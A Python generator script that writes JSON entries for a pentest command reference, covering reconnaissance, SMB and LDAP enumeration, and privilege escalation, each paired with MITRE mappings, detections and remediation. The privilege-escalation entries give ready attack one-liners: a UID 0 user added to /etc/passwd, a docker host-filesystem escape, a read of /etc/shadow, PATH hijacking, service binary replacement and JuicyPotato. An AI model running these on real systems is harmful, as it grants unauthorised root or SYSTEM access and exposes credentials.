#!/usr/bin/env python3
"""Bulk generator batch 3 — targeting 250+ total."""
import json
from pathlib import Path
OUTPUT_DIR = Path(__file__).parent.parent / "data" / "commands"

def e(id,tool,cat,phase,os,cmd,name,desc,args,output,use_case,prereqs,mitre,tactic,detections,remediation,mistakes,alts,refs,tags):
    return {"id":id,"tool":tool,"category":cat,"phase":phase,"os":os,"command":cmd,"name":name,"description":desc,"arguments":args,"expected_output":output,"use_case":use_case,"prerequisites":prereqs,"mitre_mapping":mitre,"mitre_tactic":tactic,"detections":detections,"remediation":remediation,"common_mistakes":mistakes,"alternatives":alts,"references":refs,"tags":tags}

L=["linux"];LW=["linux","windows"];LWM=["linux","windows","macos"];W=["windows"]

# ===================== MORE RECON (15) =====================
R3=[
e("nmap-script-http-vuln","nmap","reconnaissance",1,LWM,"nmap --script 'http-vuln*' -p 80,443 <target>","HTTP Vulnerability Scripts","Runs all HTTP vulnerability scripts — checks for Shellshock, Slowloris, etc.",{"--script 'http-vuln*'":"All HTTP vuln scripts"},"| http-vuln-cve2014-6271 (Shellshock): VULNERABLE","Check for web server vulnerabilities without a full scanner.",["HTTP ports open"],["T1190"],"Initial Access",["Exploit probe patterns in WAF"],["Patch web servers","WAF rules"],["Not checking HTTPS separately"],["nuclei","nikto"],["https://nmap.org/nsedoc/"],["http","vulnerability","shellshock","nse"]),
e("nmap-firewall-detect","nmap","reconnaissance",1,LWM,"nmap -sA -p 80,443 <target>","ACK Scan (Firewall Detection)","Determines if ports are filtered by a firewall — ACK packets bypass stateless firewalls.",{"-sA":"ACK scan (detects filtering)"},"PORT   STATE      SERVICE\n80/tcp unfiltered http\n443/tcp filtered  https","Determine which ports are filtered by firewalls vs actually closed.",["Root privileges"],["T1046"],"Discovery",["ACK packets without prior SYN"],["Stateful firewalls","IDS"],["Confusing 'unfiltered' with 'open'"],["nmap -sW (Window scan)"],["https://nmap.org/book/man-port-scanning-techniques.html"],["firewall","detection","ack","filtering"]),
e("nmap-traceroute","nmap","reconnaissance",1,LWM,"nmap --traceroute -p 80 <target>","Network Path Discovery","Maps the network path to target — identifies routers, firewalls, and network hops.",{"--traceroute":"Trace route to target"},"TRACEROUTE (using port 80/tcp)\nHOP RTT     ADDRESS\n1   1.00ms  192.168.1.1\n2   5.00ms  10.0.0.1\n3   15.0ms  target.com","Map network topology and identify intermediate devices.",["Target reachable"],["T1018"],"Discovery",["Traceroute packets (TTL manipulation)"],["Block ICMP time-exceeded at perimeter"],["Not using TCP traceroute (ICMP often blocked)"],["traceroute","mtr","tcptraceroute"],["https://nmap.org/book/man-traceroute.html"],["traceroute","topology","path","network"]),
e("sherlock-osint","sherlock","reconnaissance",1,LWM,"sherlock <username>","Username OSINT Search","Searches 300+ social media sites for a username — maps a person's online presence.",{"<username>":"Target username to search"},"[+] GitHub: https://github.com/target\n[+] Twitter: https://twitter.com/target\n[+] LinkedIn: https://linkedin.com/in/target","Map a target's social media presence for social engineering or information gathering.",["Target username"],["T1589"],"Reconnaissance",["Passive — queries public sites"],["Use different usernames per platform","Privacy settings"],["False positives (common usernames)"],["maigret (more sites)","whatsmyname.app"],["https://github.com/sherlock-project/sherlock"],["osint","username","social-media","passive"]),
e("spiderfoot-scan","spiderfoot","reconnaissance",1,L,"spiderfoot -s <target_domain> -t all","SpiderFoot OSINT Automation","Automated OSINT collection — queries 200+ data sources for comprehensive target intelligence.",{"-s":"Target (domain, IP, email, name)","-t all":"All module types"},"[*] Querying 200+ sources...\n[+] Found 45 subdomains\n[+] Found 12 email addresses\n[+] Found 3 leaked credentials","Comprehensive automated OSINT — combines dozens of tools into one scan.",["Target identifier","Internet access"],["T1589","T1590","T1596"],"Reconnaissance",["Passive — queries third-party sources"],["Monitor for data exposure","OSINT awareness training"],["Scan takes very long with 'all' modules"],["recon-ng","maltego","theHarvester"],["https://github.com/smicallef/spiderfoot"],["osint","automated","comprehensive","intelligence"]),
]

# ===================== MORE ENUMERATION (15) =====================
E3=[
e("nmap-smb-users","nmap","enumeration",2,LWM,"nmap --script smb-enum-users -p 445 <target>","SMB User Enumeration (Nmap)","Enumerates domain/local users via SMB using Nmap NSE scripts.",{"--script smb-enum-users":"Enumerate users via SMB"},"| smb-enum-users:\n|   CORP\\administrator (RID: 500)\n|   CORP\\guest (RID: 501)\n|   CORP\\svc_sql (RID: 1103)","Discover user accounts via SMB — useful for password attacks.",["SMB port 445 open"],["T1087"],"Discovery",["User enumeration via SMB"],["Disable null sessions","Restrict anonymous access"],["Not trying authenticated enum"],["netexec --users","rpcclient enumdomusers"],["https://nmap.org/nsedoc/scripts/smb-enum-users.html"],["smb","users","enumeration","nse"]),
e("nmap-smb-os","nmap","enumeration",2,LWM,"nmap --script smb-os-discovery -p 445 <target>","SMB OS Discovery","Identifies the operating system, domain, and computer name via SMB.",{"--script smb-os-discovery":"OS info via SMB"},"| smb-os-discovery:\n|   OS: Windows Server 2019\n|   Computer: DC01\n|   Domain: corp.local","Identify Windows version and domain membership without authentication.",["SMB port 445 open"],["T1082"],"Discovery",["SMB queries"],["Disable SMBv1","Restrict anonymous access"],["Not noting domain name for further attacks"],["netexec smb <target>"],["https://nmap.org/nsedoc/scripts/smb-os-discovery.html"],["smb","os","discovery","domain","windows"]),
e("wfuzz-basic","wfuzz","enumeration",2,L,"wfuzz -c -z file,/usr/share/wordlists/dirb/common.txt --hc 404 http://<target>/FUZZ","WFuzz Directory Scan","Web fuzzer for content discovery — alternative to ffuf/gobuster.",{"-c":"Colorize output","-z file":"Payload from file","--hc 404":"Hide 404 responses"},"000000001:   200   125L   admin\n000000045:   301   0L     backup","Content discovery with flexible payload handling and filtering.",["Web server accessible"],["T1595"],"Reconnaissance",["High request volume"],["WAF rate limiting"],["Not using proper filters (--hc, --hl, --hw)"],["ffuf","gobuster","feroxbuster"],["https://github.com/xmendez/wfuzz"],["fuzzing","directory","web","content-discovery"]),
e("impacket-lookupsid","impacket","enumeration",2,L,"impacket-lookupsid <domain>/<user>:<pass>@<target> 20000","SID Brute-Force (User Enum)","Brute-forces RIDs to enumerate all domain users, groups, and aliases.",{"20000":"Max RID to check"},"500: CORP\\Administrator (SidTypeUser)\n501: CORP\\Guest (SidTypeUser)\n1103: CORP\\svc_sql (SidTypeUser)\n512: CORP\\Domain Admins (SidTypeGroup)","Enumerate all domain objects by brute-forcing Security Identifiers.",["Valid credentials","RPC access"],["T1087"],"Discovery",["Mass SID lookup queries"],["Restrict RPC access"],["Setting max RID too low (miss high-RID accounts)"],["rpcclient lookupnames","netexec --rid-brute"],["https://github.com/fortra/impacket"],["sid","rid","brute-force","users","enumeration"]),
e("windapsearch-users","windapsearch","enumeration",2,L,"windapsearch -d <domain> --dc <dc_ip> -u <user>@<domain> -p <pass> --users","WindapSearch User Enum","Fast LDAP enumeration tool — lists all domain users with attributes.",{"--users":"Enumerate users","-d":"Domain","--dc":"DC IP"},"cn: John Smith\nsAMAccountName: j.smith\nmemberOf: CN=IT Staff,...","Quick LDAP user enumeration with useful attribute output.",["Valid credentials","LDAP access"],["T1087.002"],"Discovery",["LDAP queries for all users"],["Restrict LDAP access"],["Not trying --unconstrained (find delegation targets)"],["ldapsearch","ldapdomaindump","bloodhound-python"],["https://github.com/ropnop/windapsearch"],["ldap","users","enumeration","attributes","domain"]),
]

# ===================== MORE PRIVESC (15) =====================
PE3=[
e("linux-writable-etc-passwd","manual","privilege_escalation",6,L,"ls -la /etc/passwd && openssl passwd -1 -salt xyz password123","Writable /etc/passwd","If /etc/passwd is writable, add a new root user directly.",{"ls -la":"Check permissions","openssl passwd":"Generate password hash"},"# If writable, add:\nhacker:$1$xyz$hash:0:0:root:/root:/bin/bash","Instant root if /etc/passwd is world-writable — add user with UID 0.",["Write access to /etc/passwd"],["T1548"],"Privilege Escalation",["Modified /etc/passwd","New UID 0 user"],["Correct /etc/passwd permissions (644)","File integrity monitoring"],["File not writable","Not generating valid hash format"],["linpeas (checks automatically)"],["https://gtfobins.github.io"],["passwd","writable","linux","root","instant"]),
e("linux-docker-escape","docker","privilege_escalation",6,L,"docker run -v /:/mnt --rm -it alpine chroot /mnt sh","Docker Group Privilege Escalation","If user is in docker group, mount host filesystem and chroot to get root.",{"-v /:/mnt":"Mount host root to /mnt","chroot /mnt":"Change root to host filesystem"},"# whoami\nroot (on host!)","Docker group membership = root equivalent. Mount host FS and escape.",["User in docker group","Docker installed"],["T1611"],"Privilege Escalation",["Docker container creation","Host filesystem mount"],["Remove users from docker group","Use rootless Docker"],["Docker not installed","User not in docker group"],["docker run -v /etc/shadow:/shadow alpine cat /shadow"],["https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-breakout"],["docker","container","escape","group","root"]),
e("linux-path-hijack","manual","privilege_escalation",6,L,"echo '/bin/bash' > /tmp/service && chmod +x /tmp/service && export PATH=/tmp:$PATH","PATH Hijacking","If a SUID/root program calls a command without full path, hijack it via PATH manipulation.",{"echo":"Create fake binary","export PATH":"Prepend writable directory"},"# When vulnerable SUID binary runs 'service':\n# It executes /tmp/service (our bash) as root","Exploit programs that call commands without absolute paths.",["SUID binary calling relative command","Writable directory in PATH"],["T1574.007"],"Privilege Escalation",["Unusual PATH modifications","Binary execution from /tmp"],["Use absolute paths in scripts","Restrict PATH in SUID binaries"],["Binary uses absolute paths","Can't modify PATH for SUID"],["linpeas","strings <binary> (find relative calls)"],["https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation"],["path","hijack","suid","linux","environment"]),
e("windows-service-abuse","sc","privilege_escalation",6,W,"sc qc <service_name> && sc config <service_name> binpath= \"C:\\temp\\shell.exe\" && sc start <service_name>","Windows Service Binary Replacement","If you can modify a service's binary path, replace it with a payload for SYSTEM execution.",{"sc qc":"Query service config","sc config binpath=":"Change binary path","sc start":"Start service"},"[SC] ChangeServiceConfig SUCCESS\n[SC] StartService: shell.exe running as SYSTEM","Replace service binary with payload — runs as SYSTEM when service starts.",["Write access to service binary or config","Service runs as SYSTEM"],["T1543.003"],"Persistence",["Service binary modification","New binary in service path"],["Restrict service binary permissions","Monitor service changes"],["Service running as non-SYSTEM","Can't restart service"],["PowerUp Invoke-ServiceAbuse","winPEAS"],["https://book.hacktricks.wiki/en/windows-hardening/privilege-escalation"],["service","binary","windows","system","privesc"]),
e("windows-token-impersonation","potato","privilege_escalation",6,W,"JuicyPotato.exe -l 1337 -p C:\\Windows\\System32\\cmd.exe -t * -c {CLSID}","Token Impersonation (Potato)","Exploits SeImpersonatePrivilege to escalate from service account to SYSTEM.",{"-l":"Listening port","-p":"Program to run as SYSTEM","-t *":"Try all tokens","-c":"CLSID"},"[+] CreateProcessWithTokenW OK\nC:\\Windows\\system32>whoami\nnt authority\\system","Escalate from service accounts (IIS, SQL) to SYSTEM via token impersonation.",["SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege"],["T1134.001"],"Privilege Escalation",["Unusual COM object instantiation","Token manipulation events"],["Remove SeImpersonatePrivilege where not needed","Update Windows"],["Wrong CLSID for OS version","Privilege not available"],["PrintSpoofer","GodPotato","SweetPotato"],["https://book.hacktricks.wiki/en/windows-hardening/privilege-escalation"],["potato","token","impersonation","seimpersonate","system"]),
]

def save(fn,data):
    path=OUTPUT_DIR/fn
    with open(path,'w') as f: json.dump(data,f,indent=2)
    print(f"  {fn}: {len(data)}")

if __name__=="__main__":
    print("Batch 3...")
    save("bulk3_recon.json",R3)
    save("bulk3_enum.json",E3)
    save("bulk3_privesc.json",PE3)
    total=0
    for f in OUTPUT_DIR.glob("*.json"):
        with open(f) as fp: total+=len(json.load(fp))
    print(f"\nTOTAL: {total}")
